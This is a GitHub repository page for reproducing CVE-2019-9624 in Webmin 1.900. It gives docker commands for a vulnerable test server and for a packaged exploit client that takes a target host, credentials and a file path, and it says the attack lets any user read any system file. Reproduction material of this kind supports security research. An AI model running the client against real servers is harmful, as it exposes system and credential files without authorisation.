Skip to content

Latest commit

 

History

History

CVE-2019-9624

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 
 
 

CVE-2019-9624

About

Exploit

Environment used

  • Ubuntu 18.04.4 LTS
  • Webmin 1.900

Reproduction

  • Server
    • Docker version
      docker run --rm -p 10000:10000 -it simaofsilva/cve-2019-9624
    • Script version
      sudo bash installation.sh
  • Client
docker run --rm simaofsilva/cve-2019-9624-client --host SERVER_IP --port 10000 --user test --pass qwerty --file FILE_TO_GET

A file will be uploaded allowing to any user to see any system file.
Examples of use: